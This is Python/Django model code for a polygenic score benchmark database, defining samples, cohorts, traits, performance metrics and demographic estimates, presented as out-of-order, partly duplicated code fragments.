models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type", "the effect', null=True) def __str__(self): if self.ci != None: s = '{} {}'.format(self.estimate,", "l['unit'] = self.unit return l def range_type_desc(self): desc_list = { 'ci': 'Confidence interval',", "categories_data = '' # if len(categories) > 0: # category_labels = [] #", "training/testing\"\"\" # Sample Information ## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases", "models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id, self.label) @property def", "= [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES,", "individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return", "self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else:", "Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') #", "Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True)", "if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate", "= models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100,", "'{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name,", "perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc", "interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range", "link multiple EFO to a single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30,", "return [] #@property #def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' | ')", "self.unit) if r != None: l.append(r) if (len(l) == 1): return l[0] elif", "max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of", "s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s def name_tuple(self):", "if r != None: l.append(r) if (len(l) == 1): return l[0] elif (len(l)", "# categories = self.category_list # if len(categories) > 0: # return [x.label for", "desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used in variant associations", "= { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', }", "# categories_data = '' # if len(categories) > 0: # category_labels = []", "Links to related objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample", "<i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring", "BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short Name',", "return '%s | %s '%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label)", "len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def", "max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait", "# return self.mapped_terms.split(' | ') # else: # return [] #@property #def category_list(self):", "class BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value and confidence intervals of", "Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return", "data = {} for type in data_types: data[type] = set() #for bm_performance in", "self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v)", "#@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def", "return None def format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit) return None", "Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance", "primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description',", "## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases',", "'</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number)", "= models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True) # Sample", "queries than filtering directly on the queryset metrics = self.performance_metric.all() if metrics: l", "## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID =", "{}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) > 0: l.append(e) # Variability v", "a single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology", "and '[' not in estimate: l[self.range_type] = str(self.range) # Variability if self.variability !=", "Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric')", "1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l = {} # Estimate", "return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return", "performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for", "ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex:", "= [] for m in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if", "models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to", "of the effect', null=True) def __str__(self): if self.ci != None: s = '{}", "self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' |", "!= None and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e += '", "no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v) # Range r = None", "Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM',", "e.g. Confidence interval (ci), range, interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability", "== 'ci': estimate += str(self.range) if estimate: l[self.estimate_type] = estimate # Range if", "self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class", "othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to", "= models.IntegerField('Number of Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES = [", "# else: # return [] #@property #def mapped_terms_list(self): # if self.mapped_terms: # return", "= list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set()", "ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of the effect',", "# Variability v = None if self.variability != None: type_desc = self.variability_type_desc() if", "l = {} # Estimate estimate = '' if self.estimate != None: estimate", "if self.range != None and '[' not in estimate: l[self.range_type] = str(self.range) #", "PubMed ID (PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample')", "desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd (cases)':", "> 0: # return [x.label for x in categories] # else: # return", "display_values_dict(self): l = {} # Estimate estimate = '' if self.estimate != None:", "estimate: l[self.range_type] = str(self.range) # Variability if self.variability != None: l[self.variability_type] = self.variability", "data def get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data", "Estimate estimate = '' if self.estimate != None: estimate = str(self.estimate) if self.range", "for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data = {}", "'Standard Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to", "'<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number)", "self.bm_data = {} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data = {} for", "show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to", "less SQL queries than filtering directly on the queryset metrics = self.performance_metric.all() if", "!= None: sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring +=", "| ') # else: # return [] #@property #def mapped_terms_list(self): # if self.mapped_terms:", "'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower()", "validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True)", "None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s def", "= '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else: return '%s:", "# return [x.label for x in categories] # else: # return [] #@property", "Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: \"OR\" estimate", "return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to extract and format the", "return categories_data #@property #def display_category_labels(self): # categories = self.category_list # categories_data = ''", "self.estimate == None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None def", "null=True, default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g.", "SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6,", "for m in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) !=", "# else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y:", "class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self):", "'' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\"", "# Unit if self.unit != None: l['unit'] = self.unit return l def range_type_desc(self):", "= models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def", "if self.sample_cases != None: percent_cases = '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)'", "return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to controlled trait", "| %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property def", "= (self.sample_cases / self.sample_number) * 100 return round(percent,2) else: return None def display_samples_for_table(self,", "#cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def", "variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard", "def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se':", "\"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect size', max_length=100,", "fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,}", "'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in", "range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval (ci), range, interquartile", "data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def", "return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts", "self.ci) else: s = '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is None:", "(mainly to link multiple EFO to a single score)\"\"\" id = models.CharField('Ontology Trait", "!= None: return '{}:{}'.format('unit', self.unit) return None def display_value(self): l = [] helptip", "r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r) if (len(l) ==", "percent_cases = '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn", "effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if", "related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id, self.label) @property def display_label(self): return", "models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range (values)',", "hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data()", "categories_data #@property #def display_category_labels(self): # categories = self.category_list # categories_data = '' #", "in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'):", "None if self.variability != None: type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc,", "not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'):", "samples used in variant associations and PGS training/testing\"\"\" # Sample Information ## Numbers", "format_range(self): if self.estimate == None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return", "return self.mapped_terms.split(' | ') # else: # return [] #@property #def category_list(self): #", "# categories = self.category_list # categories_data = '' # if len(categories) > 0:", "[ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both',", "data\"\"\" # Using all and filter afterward uses less SQL queries than filtering", "#scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def", "None: type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else:", "and self.range_type.lower() == 'ci': estimate += str(self.range) if estimate: l[self.estimate_type] = estimate #", "related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property", "__str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to controlled", "return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return", "interval (ci), range, interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True)", "in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used in variant", "!= None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate == None", "hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: # return", "median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days] range", "= self.category_list # categories_data = '' # if len(categories) > 0: # category_labels", "\"\"\"Class to describe Sample fields (sample_age, followup_time) that can be point estimates or", "+= '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring", "# category_labels = [] # for category in categories: # v_spacing = '", "max_length=100, null=True, default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') #", "describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full", "'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: # return self.synonyms.split('", "def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to", "return None def format_range(self): if self.estimate == None and self.range != None: return", "def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>:", "if len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data =", "[] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self):", "models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description", "(se) def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def", "estimate = str(self.estimate) if self.range != None and self.range_type.lower() == 'ci': estimate +=", "= {} for type in data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'):", "verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id, self.label) @property def display_label(self):", "self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def", "self.sample_cases != None: percent = (self.sample_cases / self.sample_number) * 100 return round(percent,2) else:", "def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def", "self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None:", "None: l['unit'] = self.unit return l def range_type_desc(self): desc_list = { 'ci': 'Confidence", "y: y.label) #@property #def category_labels_list(self): # categories = self.category_list # if len(categories) >", "0: # categories_data = ', '.join(category_labels) # return categories_data #@property #def display_category_labels(self): #", "ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ##", "def __str__(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s", "= models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard", "if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property", "= str(self.range) # Variability if self.variability != None: l[self.variability_type] = self.variability # Unit", "db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used", "BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in", "['scores', 'cohorts', 'samples', 'ancestries'] data = {} for type in data_types: data[type] =", "'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def", "metric data\"\"\" # Using all and filter afterward uses less SQL queries than", "= models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort',", "+= '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if", "return [x.label for x in categories] # else: # return [] #@property #def", "return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a", "#@property #def display_category_labels(self): # categories = self.category_list # categories_data = '' # if", "models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad", "in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd", "= self.unit return l def range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr':", "= '{} : {} {}' # Estimate e = '' if self.estimate !=", "[mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days]", "self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts']", "self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for phenotype in", "value and confidence intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS", "data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance))", "set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if", "estimate += str(self.range) if estimate: l[self.estimate_type] = estimate # Range if self.range !=", "= self.performance_metric.all() if metrics: l = [] for m in metrics: if (m.type", "othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels':", "BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a PGS and a set of", "# e.g. standard deviation (sd), standard error (se) def format_estimate(self): if self.estimate !=", "models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False)", "models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured =", "fields (sample_age, followup_time) that can be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate", "BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data()", "'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores'])", "data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self):", "self.range != None: type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range),", "performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES',", "#url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms',", "None: l[self.variability_type] = self.variability # Unit if self.unit != None: l['unit'] = self.unit", "'</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free", "None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability != None: return", "in ['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self):", "and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if", "for x in categories] # else: # return [] #@property #def category_list(self): #", "#cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def", "models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait,", "def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def", "v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if", "return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard", "self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data = {} data_types = ['scores',", "'<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span", "Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe", "Metric Name (Short)', max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit", "display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad,", "'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age", "models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured", "primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class", "__str__(self): return '%s | %s '%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id,", "!= None: percent_cases = '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring +=", "= no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r) if (len(l) == 1):", "#for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not", "effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self):", "null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True)", "phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad", "self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(),", "type in data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in", "models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country =", "self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value':", "self.bm_data[type] = list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores =", "directly on the queryset metrics = self.performance_metric.all() if metrics: l = [] for", "= models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True)", "l[self.estimate_type] = estimate # Range if self.range != None and '[' not in", "'{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short", "' {}'.format(self.unit) if len(e) > 0: l.append(e) # Variability v = None if", "({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a PGS and", "self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' | ') #", "self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability !=", "{} # Estimate estimate = '' if self.estimate != None: estimate = str(self.estimate)", "v = None if self.variability != None: type_desc = self.variability_type_desc() if (type_desc): v", "== 1): return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return ''", "display_category_labels(self): # categories = self.category_list # categories_data = '' # if len(categories) >", "self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a PGS and a", "return sstring @property def display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad", "return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time) that can", "'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return", "def get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data =", "else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data", "max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard", "category_labels = self.category_labels_list # categories_data = '' # if len(category_labels) > 0: #", 